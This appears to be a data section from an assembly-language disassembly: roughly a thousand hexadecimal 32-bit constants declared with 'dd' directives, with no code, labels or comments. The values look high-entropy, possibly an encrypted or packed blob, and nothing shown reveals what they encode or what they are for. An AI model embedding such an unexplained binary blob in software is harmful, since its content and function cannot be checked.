dd 5E3E1FEEh, 0C2B89F62h, 0C172D393h, 0E701AEE2h, 0CAC62D66h
dd 0BFD54FABh, 9AF6FF7Dh, 3E48CBFDh, 95C1B6EAh, 0E4C3B4D1h
dd 3E0815ACh, 2FC8EE14h, 3C2928C9h, 0CF15E7E4h, 0DA361A0Ah
dd 0BD9D215Ch, 2F1790E3h, 120E40EEh, 0DF2396ECh, 0E23E3038h
dd 60E51BBCh, 0E2D8C83Ah, 70410CD8h, 80C09CF4h, 1590365Ch
dd 6444D451h, 0E020832Ch, 0AFC54CE1h, 8A86C8A1h, 7F1E5436h
dd 6C9ECC79h, 92BE5A34h, 0D50227CCh, 0A4849091h, 6FDF1E6Ch
dd 62BE9292h, 0F49793FAh, 0DA587E92h, 9AC0E600h, 41671D23h
dd 44A28597h, 0D2B45200h, 1CA1353h, 0CA5BEE22h, 0A30567Bh
dd 6A4D0B69h, 5759267Ah, 74549809h, 5FFA1E1Ch, 1ED0A17Bh
dd 2DA0C6ECh, 0AC41601Dh, 0E5EC2F9h, 4DD8B268h, 2C7BCC19h
dd 8D684BF4h, 0EA1203D8h, 57100DC4h, 37E0062Ch, 14517D21h
dd 373D8FFCh, 0F22E0256h, 0A5745524h, 0F4558DCBh, 2A5040A0h
dd 90A85A0Bh, 16A1466Ch, 6288AF44h, 0CBF17E68h, 0A7A77EA4h
dd 9AF6DA1Ah, 3B88AF5h, 0E1C0B6DCh, 80F87490h, 6561353h
dd 624DEE22h, 623D2325h, 7298AD6Ch, 0E1CAB3B3h, 0A0838E82h
dd 0B4BC4B9Fh, 67385EB2h, 0A254BC5h, 0B208184Ah, 76520343h
dd 725DFE12h, 1BC9E283h, 0C223CEF4h, 1510BD50h, 3EFD11F4h
dd 7CE03032h, 14760911h, 8ADAD7FCh, 0F0723F0Eh, 66AE3333h
dd 3A6B0E02h, 4AD47963h, 1B8DE05h, 0E448D3E1h, 72E2AEE2h
dd 5F0F456Eh, 326E42BAh, 1FCF2689h, 2284F34h, 74120B51h
dd 0DA491E72h, 0C59AAF44h
dd 0A25C86EBh, 216E567Ch, 56AC3702h, 7895D918h, 0CF68B88Fh
dd 9CCE66A1h, 0FA39EF84h, 855F3CE6h, 0FC75BBD9h, 4A1A968Ah
dd 0B2D8EA4Ch, 0E513348Ch, 0B494E461h, 0CE54BB5Ch, 56ED13D0h
dd 0EAE0306Ch, 0A942D89Bh, 4BA4F2B8h, 0B81A3684h, 58CAB4CDh
dd 0C9EB4426h, 0AA5852D8h, 7279D1E5h, 0BE2B1764h, 5077BEF0h
dd 0A24D9B6Ch, 0DA584898h, 9AC0E610h, 7A1E6051h, 44B098FCh
dd 0F7DD2464h, 4258A889h, 87E89631h, 457A5C0Fh, 72B8F0ADh
dd 8095D91Bh, 0C368B88Fh, 0AAD05AD8h, 42383484h, 0EF5F95BBh
dd 0E23E127Eh, 5FF41B37h, 0B2B2FE12h, 0D32B7D6Fh, 87409FF9h
dd 0CC10365Ch, 5272FAE1h, 0E075F97Bh, 0A14858AFh, 61E0DA38h
dd 0F21F566Fh, 0E70DA6CCh, 0C2DE10A2h, 0BFAF25CBh, 928EE22Eh
dd 0AE5E86E9h, 5EE01B59h, 6F73160Ah, 326E6B20h, 0FD4D6B0Ch
dd 2928784Ah, 3B90DC12h, 47074D12h, 3A56BA8Ah, 0DCC81697h
dd 0F4BBC753h, 4EF00B69h, 0D7B0267Ah, 521D2046h, 50C71E7Ch
dd 6059A17Bh, 0F7A925FBh, 8E32F23h, 845B5937h, 8EB043A9h
dd 0BEB366BAh, 3B433973h, 0F085C90Fh, 0D278A8F8h, 8CF56D91h
dd 83C6F94h, 8AC5E694h, 388DC164h, 0DA8090F7h, 0F4D66989h
dd 3B24769Ch, 8CD45BC3h, 0FA20465Ah, 0E74EAED4h, 0CAC6285Bh
dd 0CC5097A4h, 1F0719F3h, 21E5B00h, 0EA90B6DCh, 0D2FCDC19h
dd 1A2F8CA1h, 0CCA7817Ah, 2A56395Ch, 17FED788h, 0FA4F066Dh
dd 2705E7C0h, 8ABF823Ch, 77543BE7h, 0EC1B48Eh, 0E8050F31h
dd 6A50B69Ch, 0C1F8B104h, 7F2D0BF9h, 0E3CFEE86h, 8475522Eh
dd 7293E5h, 0D4856A49h, 512D02E0h, 0AAC9BA8Fh, 82685F0Ch
dd 34E186B5h, 0BA8D2E50h, 5E3313ECh, 0BECCB065h, 9B54354Ch
dd 0CE1CABAh, 0E7D02C5Bh, 530F74A9h, 0F3A88578h, 6308291Ah
dd 0EB0DAB0h, 0B3D86725h, 5440E2C2h, 0D6A0897Dh, 65567650h
dd 0FE9E96h, 0BE6E4325h, 6221AEC7h, 0DEB9976Bh, 453253BEh
dd 1FD2A384h, 877A4F74h, 3F1FEF9Ch, 0C0BEDE08h, 7E2E03E5h
dd 0C188F187h, 0CB755B33h, 720CD7E4h, 0CEC07545h, 32D03FDh
dd 0ADC49FDCh, 93741E17h, 0F2A1C3B8h, 55A4AC95h, 2E68E4EBh
dd 91881980h, 2A6F9216h, 4B318CB0h, 65E0B028h, 0BD3810DBh
dd 0C6078E94h, 2EA22B8h, 0EC582910h, 0F2E0FB4Bh, 3A7EE5EFh
dd 0A2C8EE14h, 0A30567Ch, 7298BEE4h, 0DA00264Ch, 42688EB4h
dd 0AAD0F61Ch, 12385E84h, 7AA0C6ECh, 0E2082E54h, 4A7096BCh
dd 0B2D8FE24h, 1A40668Ch, 82A8CEF4h, 0EA10365Ch, 52789EC4h
dd 0BAE0062Ch, 22486E94h, 8AB0D6FCh, 0E2183E64h, 3A6C4F1Ah
dd 0FD3CABB7h, 0A95076AAh, 0A48706A1h, 4D2F466Ch, 3105BA97h
dd 81471924h, 0B9887DA2h, 0B1E4C248h, 1B5A4236h, 1998F4E7h
dd 0C6BA9550h, 0B36CC487h, 94F73A81h, 0D2B5DF7Ch, 999888DBh
dd 0F2C2A549h, 80095756h, 2F58F618h, 120E7AE2h, 7AA0A204h
dd 0E2284654h, 0CFFD96BCh, 0B2EEDDB7h, 6E585FD5h, 86684DF8h
dd 6FEFC1BEh, 524EA170h, 0B939F1EFh, 146C0819h, 75A035FCh
dd 0F297C214h, 0B8844E4Fh, 517587C2h, 0A95040BFh, 97CCDE3Eh
dd 88237447h, 9EC623C4h, 49AE4D64h, 362C7E9Eh, 992BD4F3h
dd 0EA383C8Bh, 956F498Bh, 5FD3D06Fh, 3A56B974h, 9683ED4Ch
dd 0B2B5D9BFh, 0B59888DBh, 0EC3F92C9h, 42688EB4h, 0AAEC1E1Ch
dd 97B35E84h, 7A96F958h, 1DFEB8BCh, 4A687E43h, 0F5BFE24h
dd 1A765938h, 0BA0BBF4h, 0DC3439C1h, 0ADE475C4h, 8CDFB2A1h
dd 0A7C7AD94h, 8A86E944h, 0CDACABEDh, 5968A6FAh, 0F1E80E34h
dd 0B9DBB555h, 92B8DE84h, 4CDAE3Eh, 0F78B512Bh, 0CAC629E4h
dd 48DBA8A7h, 1ECFE600h, 2284F73h, 6A80CC5Fh, 0D2059A4Bh
dd 78EB86ACh, 6A20BE18h, 9CFA982h, 44A76661h, 8AC6254Ch
dd 0BBE8863Eh, 2AC9821Ch, 114C707Dh, 0F1512DACh, 3892F1Ch
dd 95AF4963h, 0FE9C07A5h, 0F63566C0h, 160E5ADh, 651FCCA5h
dd 52789E73h, 4498874Ah, 0A7475CA7h, 8AB0D657h, 0F222BD32h
dd 100BA3B9h, 49EAE524h, 7BA17596h, 6D46ACECh, 22954593h
dd 0CF8898EBh, 3188D6B9h, 32DCFAABh, 2F3FE60Ch, 21E71ACh
dd 94C55E8Ch, 57FBE1BBh, 3A56B974h, 9D106B9Bh, 0E33564Ah
dd 0B21BEDC0h, 0D5DB154Eh, 508B8602h, 0F9F03F9Ch, 161C7A45h
dd 5384DAC5h, 0A2530A58h, 0B1F17F57h, 6F63292Bh, 0E1C158F8h
dd 59C68B5Ch, 11910028h, 0ADD9A59Dh, 41612858h, 8EFD4C42h
dd 7131F088h, 140D7F7h, 0A101B8B8h, 31B0E749h, 0D1D160E8h
dd 739DE142h, 1A14818h, 83AD91E4h, 5F0F1048h, 326E411Ch
dd 65B10F57h, 8176B18Bh, 8579A21Eh, 1107E1BAh, 6264ECADh
dd 5D3DD8FCh, 4AA5DE83h, 149888C2h, 0D81817F4h, 418C4E56h
dd 1B6141Eh, 0FA6058EEh, 855F33F7h, 6500ECD7h, 1275FC6Dh
dd 4D2DF0CCh, 19BAE673h, 0D218C587h, 0CC50B35Eh, 0B9D29EF2h
dd 0E2886C0Bh, 21B2EE3Eh, 9B00CE89h, 0DECD08Ch, 5A811E33h
dd 106C0E34h, 0CA817BE8h, 645314FAh, 0FA984387h, 0C908AED4h
dd 4733A9DEh, 460CE31h, 6D17CD0Ch, 87DF8DAEh, 6AA68E79h
dd 0DAF81E44h, 0FBA013A3h, 273EE5F4h, 0A066EDFh, 149ECBE5h
dd 3125AF41h, 0E1ED78A7h, 0A8D0C024h, 1F5E58F1h, 7E4BE3DDh
dd 0C7092332h, 0F6983DDAh, 392701DBh, 8FC952CFh, 829EF138h
dd 6FE7F5F7h, 524EA661h, 0B2E0062Ch, 2688FB9Bh, 16587C40h
dd 7BE7C19Bh, 6CBF7659h, 616DF834h, 2B5040A4h, 0A3B7DA71h
dd 3A0B4487h, 0E77F6D7Fh, 0CAC62E99h, 3A587EA4h, 1F4AC178h
dd 21E76EBh, 0C9B561Dh, 0B4BD9549h, 90983607h, 9A576B9Eh
dd 0EAF1564Ah, 16FFBBFFh, 0E9AB20C5h, 0A9C3E874h, 25B44E0Eh
dd 98935E81h, 4C985969h, 23502A54h, 89DB8E5Ch, 92330294h
dd 1AABDEEAh, 9B436592h, 2483236h, 0AD876D3Bh, 7B3202A1h
dd 272E6674h, 21D61675h, 62A83D8Fh, 282CC66h, 3D1BE8DCh
dd 5E82F263h, 0CAB0B436h, 5D39C84h, 1042502Bh, 343562FFh
dd 0CC910A6Eh, 641B92C6h, 0FC243ABEh, 949CC216h, 62F46A8Eh
dd 8AAD6D55h, 120105E9h, 0BAF5BD89h, 0B159551Ch, 0E2B09BC1h
dd 0C79F8E82h, 0AAE6CEB9h, 92385E84h, 1A10C598h, 478DD9FEh
dd 4A70A084h, 0C6D0FE24h, 9115DE8Bh, 0CD03CE18h, 0D2B5B3ABh
dd 527B9EF2h, 3EEF072Ch, 22486E43h, 211A3E4Ch, 0CDA483EDh
dd 0B230A6FAh, 7F61A59Eh, 2A66495Ch, 0AA1D5BF3h, 0FA23465Ah
dd 77FCAED4h, 0F25593CBh, 32587E92h, 9FB4E70Ch, 0FDD68F9Ch
dd 0C0790623h, 6E7D95EFh, 0B160B093h, 2B00C5DBh, 3C0F92C1h
dd 8ED037E4h, 256441F4h, 825B2582h, 2F275D7Ah, 120E6621h
dd 7AA0C6EFh, 67FE2020h, 4A46AE1Fh, 5ADD8AA4h, 0E5BF98CEh
dd 0BCCA94Ch, 2A239D7Ah, 0D78F35A2h, 0BAD63E89h, 22486E97h
dd 0F468388h, 0F22E06C7h, 0B285D34Ch, 3D17F02Ah, 0D5ADD274h
dd 7A986EFBh, 5DFBDDAh, 0DAEE9737h, 619603C3h, 0A7D3D535h
dd 9AF6DEA9h, 0C0DF9C83h, 6A90B6DFh, 0AC100A31h, 8A9F7951h
dd 5958060Bh, 0B256A983h, 0D9FEAB1Bh, 158B8DDDh, 7DAC0B3Fh
dd 62FBF62Ah, 0E5C4160Dh, 4C986369h, 0E2082D54h, 0BD5EE2BCh
dd 84E05BA1h, 1A40668Ch, 758ABAF2h, 0DC2893D9h, 52789EC4h
dd 52E5732Dh, 0DDB79366h, 0B215530Bh, 0F2183E52h, 5FF4A2CCh
dd 3D1603DCh, 8FD58163h, 96B8E83Ch, 8E20466Ch, 9CEF46C3h
dd 0E348E9C3h, 99908064h, 0EE00EEB4h, 7790E570h, 0C1F75D24h
dd 0EA5D9BB3h, 3A68869Ah
dd 0EDBDEE14h, 3293EBFCh, 698BED2h, 243BCE0Ah, 6BD0714Bh
dd 0A019DF04h, 2400C121h, 794406ECh, 0DA978B5Eh, 0FADB968Ah
dd 37525495h, 1A765E2Fh, 88E87E5Eh, 0DC28A9D9h, 0EA1E34C4h
dd 3F17FBCEh, 227E5631h, 8AB0D6ECh, 0BBA83910h, 2F38C066h
dd 724368C8h, 0EA63DC74h, 3A0557AFh, 0D207053h, 54B00B51h
dd 0CAF0363Ch, 82510BA4h, 745EC54h, 0A828784Ch, 0AA110EBAh
dd 0EA5D9BB3h, 3A20869Ah, 0A1BCEE14h, 1892FCh, 44A02341h
dd 53AB404Ch, 74572209h, 2F275D1Ch, 120E6621h, 3AA0C6ECh
dd 0B2B82721h, 72ED13BEh, 4572FE12h, 2C78C309h, 82A84EF4h
dd 5A1B435Ch, 0CCFD947Ch, 10E03014h, 9A2E537Fh, 0F47CECDh
dd 0F22E06C1h, 5A80A7CCh, 0EB580C40h, 12CED396h, 7678DE32h
dd 64854C6Fh, 48898ECh, 4B487097h, 97DD8954h, 9AC0D034h
dd 77284E76h, 605802DEh, 0E4C080E1h, 0B3CBE0ACh, 94F726A9h
dd 2280EE7Ch, 8533BEE4h, 0EC3883C9h, 426886B4h, 42A1821Ch
dd 0EDC7A3B5h, 4205431Bh, 0E6082E62h, 410596BCh, 37D24694h
dd 1A765E13h, 75E5255Eh, 0DC2893D9h, 52709EC4h, 0DCF1732Ch
dd 28A8ED2Ch, 0BC884959h, 0C1B35864h, 4F6B0C0Ch, 0DAC1B652h
dd 12CFD396h, 7678DE32h, 65854C6Fh, 48898ECh, 6F75E197h
dd 3258489Ch, 0FCC0E61Ch, 76E8CFCCh, 625436DFh, 0EA67BB4Eh
dd 9106869Ah, 14D581Bh, 0A1306044h, 8D647E0Ch, 7F85D1B3h
dd 4268B88Ch, 0DE90F61Ch, 1068EE8Dh, 4C985B69h, 67FF8454h
dd 4A46AE19h, 0B2D8DE24h, 1835E03Ch, 0CD25CAF0h, 77B5BCA2h
dd 0DB78A8FCh, 8CDFB6A1h, 0A2E30894h, 8DC5D300h, 0BD983ED4h
dd 0B22AE633h, 3D17F24Dh, 12F5F36Bh, 0D2B8DE32h, 4246466Ch
dd 60FD9FB2h, 61963F88h, 0B7526614h, 9AF6DE93h, 0A82BAEB4h
dd 956CE234h, 2570AEBBh, 0C582329h, 0A248EE14h, 0BA32237Ch
dd 0EF3D3462h, 0BC001074h, 47940E1Fh, 0AA60F169h, 52C71104h
dd 868B2E46h, 67FFD1ABh, 4A46AE19h, 0B2D9FE24h, 5AF06DF9h
dd 0BA354BFEh, 1BA366Ah, 0D1C0F8CBh, 27450CECh, 444858ACh
dd 20B16657h, 0CABDBB93h, 5A80A6FAh, 0ED9D0E36h, 12F5F36Bh
dd 92B8DE32h, 0E0554668h, 0E7826E64h, 0CAC62EA3h, 0AFCDB2Eh
dd 7A01E63Ah, 64902864h, 6A201D5Dh, 924816AFh, 2FF03A6h
dd 5562EE22h, 3C08F3F9h, 7A98BEE4h, 0BC10534Ch, 48800D0Ch
dd 9CE868B9h, 0A2933884h, 0CAA82DEDh, 7C8D241Ch, 0E070A084h
dd 8A7D7BD3h, 1A4066BAh, 0F719CEE4h, 52761329h, 0F7726647h
dd 0BAD63EB2h, 0E27BC5F2h, 3A0DFF56h, 518085Bh, 6CB80349h
dd 0E2E80E34h, 9B4F039Ch, 0F4A33573h, 0F0384FD4h, 54B03071h
dd 0C914D63Ch, 0AC6DBAEh, 31A6E63Ah, 3D98F35Dh, 0AB1AB6EAh
dd 0ED48BBCEh, 9106869Ah, 27CAB6A4h, 0A066EE1h, 0D71D494Eh
dd 0D9001074h, 36698EB4h, 0F55013Eh, 123868BCh, 0FA4C6ECh
dd 478DD942h, 4A70A084h, 0C7DBFE24h, 0E0C48E89h, 2940310Bh
dd 1DEFC9A6h, 64403B41h, 0BAE0062Ch, 924B1A9Ch, 0F477C35h
dd 0F22E06C1h, 0DA80A6CCh, 0C5582E40h, 12CDF3B6h, 7279DE32h
dd 0F2A94B76h, 0C78AAEF0h, 0CAC62EA1h, 0B25B9A64h, 2A6BE2C8h
dd 0BA4EE415h, 0CF9A5623h, 0D2CE26D9h, 0BF972DCAh, 0A2FED6B1h
dd 0A30565Ch, 0F76FED90h, 0DA361EE9h, 62688EB4h, 6D27FB68h
dd 12385E87h, 0EA10C398h, 69FBC5FEh, 0E2FD1D7Bh, 99D8C81Bh
dd 0E601EF4Dh, 7A29644h, 0EA260EC1h, 0F7FD696Eh, 0BAE03014h
dd 56482E94h, 0DA08B0F0h, 6F9D34A7h, 0B18090F4h, 3D50683Eh
dd 0B7F57C7Ch, 0F4B8E83Ch, 5FA5B1C7h, 618898ECh, 0BEF1163Ch
dd 97DD89D7h, 9AC0D034h, 76084E74h, 695741D1h, 0A6F81E44h
dd 90F036A9h, 6D431DFFh, 35F0D3F7h, 0BAB3BED2h, 0E9FC6EC5h
dd 0E7ED797Dh, 0AAD0C024h, 6738DE84h, 0E7254BE2h, 6808186Ch
dd 0B3F0D6B4h, 3F208D27h, 3E04AB88h, 6269CEE4h, 419B8654h
dd 0EA1E9827h, 1186C61Dh, 0A2C7D6F2h, 8AB06E94h, 94F93C64h
dd 0DF2BFE67h, 0A4EE7BFDh, 4C904724h, 387B6EAFh, 0C290C3E1h
dd 0E77FAEE2h, 0CAC62E99h, 22587EA4h, 0B197E079h, 1BC3168Ch
dd 41B8E557h, 592835BCh, 0C5F4E21h, 0A5DEF14h, 0B306043h
dd 56DC35DDh, 0BDBDAF48h, 0C968B8A4h, 9CEF5AA1h, 0BABD7584h
dd 8DA0F0D3h, 0D4308BD1h, 4A70D6BCh, 45DA8A24h, 1E82CD54h
dd 1FF98F4h, 0DC2FD6E1h, 0D6779EC4h, 0BAE007F5h, 2248637Ch
dd 0D8F59DFCh, 0C1547B2Ah, 16C488FEh, 57170E78h, 2A664D0Eh
dd 0AD4C5B8Dh, 7173465Ah, 0BA8B928Ch, 41D865C3h, 0D2B04AE7h
dd 113F19F9h, 34179AE1h, 2893EDDCh, 2A7D9748h, 3960B093h
dd 2741E656h, 0A066980h, 8DB0CD6Fh, 0DA00A6FFh, 0B7D166B4h
dd 175B09E3h, 120E6150h, 8F0D2EBAh, 7783D1ABh, 4A46A968h
dd 0B1D0B4AFh, 0D46B6AC6h, 8DAD2777h, 0EA1156D4h, 8FC91C4h
dd 0B9E0062Dh, 1477B621h, 1205D5FCh, 5E18085Bh, 0DF8F4EF0h
dd 0C2E80E96h, 1543011h, 0A4874681h, 0AA26456Ch, 9D7DC43Ch
dd 1E4D95C3h, 3258489Bh, 0DDFBED79h, 19AB4178h, 8190B6DDh
dd 66D2748h, 3560B093h, 0A2C9E391h, 92B5557Ch, 149888DBh
dd 0FFFF1ECDh, 42940BBBh, 0EA5BF61Ch, 267B7586h, 8F8D2EBCh
dd 5F31D1ABh, 4A46A968h, 0B23C7B2Bh, 9F43668Ch, 829EF12Ch
dd 0D588B35Fh, 52F39EF2h, 0B5EC4107h, 2248A316h, 82F7EDFCh
dd 0F2DCBD6Bh, 9A03A6CCh, 0D6AF0D36h, 15C8F39Fh, 0C2EADE32h
dd 0C5D4F393h, 0F777AEE2h, 0CAC62D6Eh, 3D98FBFEh, 9AC05189h
dd 2B4A774h, 95ACB6DCh, 0D26C9B4Bh, 4E086ACh, 294DE101h
dd 8130567Ch, 31B3BFA2h, 66E87678h, 7B977140h, 9CEF22A1h
dd 114F2B84h, 4C9F1E69h, 7A8D2D54h, 0C370A083h, 8498FEA1h
dd 2140ED8Ch, 0B4973671h, 0D118445Ch, 64476241h, 8789742Ch
dd 52486E94h, 9558E18Eh, 7F183E64h, 9B0B5A82h, 80EB0C1Fh
dd 2AD54D8Ch, 0E7B8E844h, 0EAE4C560h, 26079F2Bh, 21910A18h
dd 0B7D7BDBFh, 9AF6D9B4h, 9A9DC514h, 829080E3h, 2D07EB1Eh
dd 3A602FCDh, 0ACBD6E14h, 783C1157h, 7ADF85EDh, 253CA443h
dd 4D21714Bh, 552E4499h, 3604D57Bh, 5205616Dh, 1DF72E54h
dd 89BE943h, 0D2FCB4A5h, 54A0668Ch, 8E230EC7h, 0A95B178h
dd 0DB78A8FBh, 8CDFDAA9h, 8BF1E394h, 89B0D6D4h, 0C427A6E1h
dd 0FF25C0CCh, 0C12E257Ah, 687B62DEh, 69FE1808h, 0A8A18184h
dd 6788AED4h, 43F0163Ch, 6C0782E2h, 0F3FB1CFh, 21E75EAh
dd 658F5E1Dh, 0D2F904C1h, 5034D6ACh, 5D37843Ch, 3C0BA8E9h
dd 2D583BE4h, 0DB05AE43h, 2808EB4h, 422F09F9h, 12385E95h
dd 3CD4A3BFh, 0B16D423Dh, 3805F5D9h, 0F3A18A4Dh, 76F5998Ch
dd 7DA8F8CBh, 0DC2B64C9h, 26FD17C4h, 52E03013h, 22486E8Dh
dd 0EBE4B3AFh, 85575B0Fh, 29F2C3A2h, 9298675Ch, 43261FEEh
dd 0F7DFBB68h, 0EBC8116Ch, 8A77513Dh, 0CAF0162Fh, 570A1BF7h
dd 0E8AF927Fh, 6B5A1E11h, 0FFCDFAAh, 85F87B23h, 0C5887544h
dd 0A2DA06EBh, 6F63567Ch, 19FBDFA6h, 0A8505639h, 2E01F8DDh
dd 0AAB59179h, 0FAEEB6D3h, 62483913h, 0B1082E54h, 2B18D5D9h
dd 0FCBD994Ah, 7C2912E3h, 0EBDA9E8Dh, 8F7C5F2Ah, 578FBA3h
dd 4508B5C4h, 0AF1C3E6Bh, 0BC8A6679h, 0A27C5464h, 0A5D7A7A6h
dd 0F4D404A1h, 0E6CFF9Ch, 0A9FE4BFBh, 3A0A465Ah, 5CE01359h
dd 9AA0160Ah, 82ED81F4h, 0F2C0D036h, 22C4E75h, 3D91DC88h
dd 0ED8C8BBBh, 5034869Ah
dd 3737B910h, 0A066908h, 8D8C7A67h, 0EC3F4AF9h, 0C0FD71B4h
dd 0F5D0C027h, 7A8DD347h, 2CA0F0D2h, 0D98EBBABh, 0B2F3968Ah
dd 95CF1DBh, 9340668Ch, 0B497B671h, 0BC105C5Ch, 69BA0B3Bh
dd 7A65061Ah, 22ECEA9Bh, 4A9BD6FCh, 0F1726E34h, 3281CC9Ch
dd 2E80E34h, 48C589CAh, 11B8E83Fh, 7E2FB994h, 6288AB3Ch
dd 0F58C93B5h, 0BFD57E92h, 9AF6D98Ch, 3DA0DBF9h, 38C1B6EAh
dd 2DA81E2Eh, 0C5B0839h, 5D306D14h, 0F86D273h, 72F2BEE4h
dd 0E57C93B3h, 0D7978E82h, 0AAE6CD96h, 1DC7A607h, 7AA55968h
dd 728DA754h, 7970A083h, 0E31BFDEDh, 1E2A37DCh, 0FE1D31A5h
dd 15100063h, 6443F851h, 0B520832Ch, 224D1510h, 379E5FCh
dd 0C427AAE1h, 0BD1F7CCh, 0CDE8115Ch, 0BFAF269Ch, 928EE5AAh
dd 7E2F86E9h, 6288ABE0h, 0F56893B5h, 8A9B7E92h, 9AC09604h
dd 0F51005FFh, 5CA81359h, 0D2F81E44h, 3966F3BCh, 94D88991h
dd 9E2657Ch, 85694925h, 7E85AFADh, 0FA68B88Bh, 0AAD0DEB3h
dd 1104150Fh, 4CB0A169h, 0E1DA1D54h, 0BD81617Dh, 2E5D77C5h
dd 0D94050B3h, 84E379FBh, 6725D5A5h, 0E5778697h, 6AE3126Fh
dd 0A8905DDh, 0B03106FFh, 9C71493Bh, 0D99DD235h, 0B0E9024Eh
dd 161BFD7Ch, 91AC9C8Fh, 0BEAD562Eh, 0BB7F519Ch, 4FCBD71Fh
dd 326E4134h, 0BE946DCFh, 8DE87D64h, 6A900E5Eh, 1D73DD44h
dd 87ED8D47h, 0A2FED07Ch, 39EFDD80h, 13A4122Dh, 0A03C203Eh
dd 62448CC3h, 0DE8CCAB6h, 66166268h, 0FA0FA31h, 69C1CDBCh
dd 1235ABBDh, 0B9ACFE61h, 480335B1h, 0B12DC1F4h, 61EFC9A3h
dd 1B2FA3C7h, 3EEF4562h, 0DDB791B2h, 0DFF381C1h, 0E99C312Ah
dd 677F5933h, 0F0DB4D63h, 0D540F293h, 0C28521FBh, 0F56F123Fh
dd 9D77AB50h, 222B25C3h, 0CDA78089h, 6028F679h, 0EAD7B188h
dd 956F48FDh, 2C149A4Bh, 0E8537953h, 0A2C8F8FCh, 0F553BE7Ch
dd 7270411Bh, 8700264Ch, 713B6335h, 7139F62Ah, 76385E87h
dd 0CF2BF413h, 0E23E11CCh, 2C521FD8h, 0E895C0A5h, 1984E383h
dd 0DC23CEF4h, 8CCE3560h, 1728A545h, 0B9548323h, 61BF6E94h
dd 8A90D6EAh, 559D3164h, 0AC80A6CFh, 0CDEA5277h, 2A53EB18h
dd 9AFB5504h, 5A80E651h, 0ED0CA174h, 0F7F0163Fh, 12785E84h
dd 99446203h, 0BBC04E74h, 656F4922h, 0D2FB67C6h, 0E6C505ACh
dd 0A2C8D82Bh, 813814F7h, 0B3B3AEAEh, 1A33223Fh, 8A6B8B5Fh
dd 23C0BC95h, 2407FE01h, 76EAC5ECh, 0E3082EECh, 0DA98C7BCh
dd 822701C3h, 2C78C519h, 0B2887FF4h, 0DC2892E9h, 0AC58F4C4h
dd 0AE985EE5h, 0DDAF187Ch, 85625303h, 10CBFCF0h, 622533FDh
dd 27030E02h, 12F5F36Bh, 92B8DE32h, 0D854476Ch, 5A2D2B23h
dd 0CAF3160Ah, 3E2D7EA4h, 0A265438Dh, 0FDD74E42h, 607B4D23h
dd 0EA5D93C5h, 3A60869Ah, 0A4A0E614h, 5330567Ch, 7298B88Ch
dd 0F2E87E4Ch, 0C8977153h, 9CE86B99h, 38BCD884h, 7A96FE71h
dd 0DA95ABDCh, 0AA92968Ah, 8A7D7BD3h, 1A4866BAh, 8BDDCEF4h
dd 0D28F8BDCh, 26799EF2h, 1F65F1E9h, 224858ACh, 0FEB8D6FCh
dd 6FA5BE7Fh, 5F8090F4h, 7F68BE40h, 2A664E02h, 121FAA01h
dd 0CC18D9D1h, 0FCFCABD4h, 0F25593CBh, 32587E92h, 93B4660Ch
dd 3AB5F3F4h, 1D92B6EAh, 325D9DCDh, 3A60B093h, 5D3BE9FCh
dd 0F751BE83h, 270411Bh, 5100264Eh, 74571229h, 0A4DF51Ch
dd 0FA3868BBh, 855F3A95h, 0E058AA5Bh, 0FFFB96BCh, 0B2EEC1BCh
dd 197C3807h, 7FD2262Ah, 681FC9A3h, 52789CFEh, 0DAC44CADh
dd 0A9A86E94h, 89E68402h, 881B2A1Eh, 0FF0551DCh, 0C2E8380Ch
dd 5F40769Ch, 76055710h, 77207053h, 54B01E61h, 0AD7D9D3Ch
dd 0C15848B4h, 0B679B1A8h, 8F284E7Eh, 5C80B669h, 635DED44h
dd 0C96265ACh, 74D19B0h, 0A306044h, 7D88BEE4h, 0DA0088C8h
dd 6A1B71B4h, 553E40F4h, 0C6ADD57Bh, 0FFA0F0D3h, 7A8C2186h
dd 0C17096BCh, 84E76691h, 0A0AED8Ch, 0E28C8475h, 0C1F0365Ch
dd 500B968Eh, 0C8E3CF1Fh, 45C55580h, 1B0E0ECh, 0C40859E9h
dd 0D1D6D4CCh, 676B2A08h, 2A6666FBh, 0F51F5D04h, 0FA20466Ch
dd 6380D45Fh, 3DF31E76h, 0B7D38923h, 9AF6D9A0h, 3A8DCB83h
dd 6AD0B6EAh, 0D08C1E44h, 48639E5Bh, 2BF8C718h, 3C0FB6C9h
dd 5AEB35E4h, 5FF7164Dh, 425EB611h, 0AAD0F65Ch, 0ACF5CF0h
dd 86E92EBDh, 951D1ABh, 620395B0h, 0E3D48C0Fh, 45E495DAh
dd 321D43ADh, 63100064h, 64477A79h, 0E544F52Ch, 0B07961CAh
dd 8A635171h, 67223E64h, 5AB69E6Fh, 10810841h, 386420E4h
dd 7A488E8Ch, 5DF9CCCh, 6EC2258Eh, 3DE05C3Fh, 460DB21h
dd 9AC0E60Ch, 769C364h, 0E719A5A9h, 0D2CE21A4h, 2A0703AFh
dd 54BEE22h, 0A30561Bh, 5ADB95E4h, 0DA52A1C5h, 0C79F8EB4h
dd 0AAE6CA7Ch, 12385E85h, 3967C198h, 42A88E5Ch, 0EFF5611Ch
dd 0B2D8C81Ch, 6EC0668Ch, 0F8409CF3h, 0B0EFC9ABh, 6D98134Fh
dd 0BF03061Ah, 0C960251Dh, 563D5DF1h, 1118085Bh, 0D1834DCEh
dd 471F267Fh, 2A664E39h, 92B8DE07h, 7FAB5218h, 62BE9130h
dd 0F5209B3Fh, 0B75B7E92h, 9AF6D9C0h, 48A34675h, 0F6153DCCh
dd 0EBF8287Bh, 39138EE6h, 0A3C0A49Dh, 69B3463Eh, 0F713BEBCh
dd 0DA3619E8h, 42403EDCh, 0A292F71Ch, 427B5FDDh, 42035366h
dd 67FF2E62h, 4A46AE19h, 0A2D8FE24h, 974360F8h, 829EDE93h
dd 6FE736EAh, 524EA661h, 0BAE2062Ch, 0E4B67AE1h, 0B215530Bh
dd 0F2183E52h, 5CF5A6C8h, 0FA4CBBBEh, 0AFA776AAh, 928EE6A1h
dd 0FA20066Ch, 6502A5A1h, 0C85AD43Eh, 0D9AF9C72h, 0A8C76C05h
dd 0D42AE4B6h, 0B8A3413Eh, 0B6DA9520h, 0B9388423h, 94F792A9h
dd 8E3F567Ch, 8D67443Ah, 0E59893B3h, 0D7978E82h, 0AAE6CDCEh
dd 2DACEB7Bh, 0EF5FC6DAh, 0E23E1512h, 75F01B31h, 2755FE12h
dd 1A765904h, 82C29CA5h, 0D56C83A3h, 0C7879EF2h, 0BAD63DEAh
dd 1D34DB6Bh, 1F4FD6CAh, 0F22E0522h, 64E81341h, 77170E02h
dd 2A6649E4h, 502D2152h, 79207057h, 54B7D271h, 2233163Ch
